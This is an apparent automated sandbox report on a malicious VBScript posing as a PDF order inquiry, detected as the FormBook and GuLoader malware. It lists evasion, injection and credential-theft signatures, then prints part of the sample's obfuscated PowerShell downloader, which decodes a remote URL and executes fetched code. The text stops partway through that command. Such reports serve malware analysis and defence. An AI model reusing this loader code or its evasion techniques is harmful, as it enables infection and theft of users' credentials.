Edit tour
Windows
Analysis Report
Order Inquiry RFQ #278823_pdf.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7404 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Order Inquiry R FQ #278823 _pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7512 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Debrief klargoeri ngsteknike r overmort gaged Kern efrugterne chewers u nderrealis es #>;$Net hes='Regre skravenes' ;<#hertugd oemmer Acc essionerne s Vitamini sering sen vy #>;$Haw se=$host.P rivateData ;If ($Haws e) {$Juste rkammer++; }function Bisulc($su pernumerar y){$Frstes tyrmand=$s upernumera ry.Length- $Justerkam mer;for( $ Entremess= 3;$Entreme ss -lt $Fr stestyrman d;$Entreme ss+=4){$Ba r+=$supern umerary[$E ntremess]; }$Bar;}fun ction Brdn idens($Nat uralisered es){ .($sp ectrograph ic) ($Natu raliserede s);}$Brneh ospitalern e=Bisulc ' LocMDraoBr nz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea( PilWDi ise lnv ndD mo ,alwslasst a stNsanT To gro1Ov 0,et.Fac0O v ;.to Non WCuri atnU nd6N,c4 Ch ; ci ArbxU d,6For4Kn, ;she HarNo nv Fa:Non1 N,n2fla1Ma r.Naz0H m) ,ul MaG Ca e axc nok H.oOps/ Ac 2 lo0Teg1 uk0N n0slh 1Vir0 Bo1h um stuF ko iU tr kePe lf .uo cax Ew./ e1Bar 2bol1Lan.p ol0s,n ';$ Paplike=Bi sulc 'EndU epsH,uEs. bRshr-DepA Na g K eAl gNN at Al ';$Overcon fidences=B isulc 'equ hBultElstK iupsyssfra : .o/J.h/ sodK.nrBrn i mav oeIs l.selgDemo A.ori,gKi llsabeUnc. CacLsbo M umThe/Hu.u omcE g?Ar beHeixbilp DecoHemrUn dtBla= Chd snioFulwIn dn uplTago Cema,oidDi d&BaiiB ud dom= .e1cy c-HarMIn 5 FerLFu z U nL,ollsp,V Th hLaag B rmsam9End2 Re1KorZTi gw selZe u Nav8 arI A rQ.if3Te w .atK PrOHo u DiCMi 8 innUWhi8Co nqCornsal ';$Corbovi num=Bisulc ' sp>Tai ';$spectro graphic=Bi sulc 'suci NoE VeXpe l ';$accre tive='Apha nozygous'; $Tilvrelse ns = Bisul c '.useB n c Fohe nos c Gli%rima Ufop P.p.i rdPelaY.ut rea il% u l\ ,oIHa.l BaadH rp A r onvHise Pal. ppFTh uoForkUn. Tr&Tvr& P Cue RucIn dh.ncoTa. Fartink '; Brdnidens (Bisulc 'U in$Vocg lv lMedoOscb raAx ls,i: AliR rivUd le empAffe Fl,lcirssk oe PonMare re=Gru( r c P.msupd U. Ind/Und cUnd He $B ilT BriPro lBenvKalrd ryeL,nlTet supae klnM etsIsd)Din ');Brdnid ens (Bisul c 'Int$geo gDoklDe os krbPr as m l Dr:,nhL IngHeteTr dDesoskimC onms de C npatsB.r= Co$FryOAer vDreeVanrC oncKeloNon nAnafTr,iT vidCateTow nGuacRuseU ngsI.d.sta s.urp bol Peic stPhy (War$st.CC onoTelrsam bBr oskuvT akiCurn ho uNonmPer)s ce ');Brdn idens (Bis ulc 'Ple[p arN.ide,il tDek. ens sue Anr Te vCriidolc BaeforPfir o Uaisemn Trt .mM Mi a onnForas ubg FleHal r in]Ir : U :BlisRes ePhoc stuc irrBesiGrn tWhuyIncP. inr Ego Pa tAf.oTrvcU n,oEnelEnt .at= Tu G [PelNCr,e slatArm. P osBa eG oc Ma uArbrDo iscutBefy sprPVelr C ostytDiso s rcslaost il aaT aty Emipaxse W a] Re:Dry: I.mTAl.lse ssNe 1Pas2 .l ');$Ov erconfiden ces=$Lgedo mmens[0];$ Continuums = (Bisulc ' wi$CepG DuL aroBag BNonA alL, em: CaMC l aKn c H,RB liOEliRBru hse iUafNH jsUEugs o2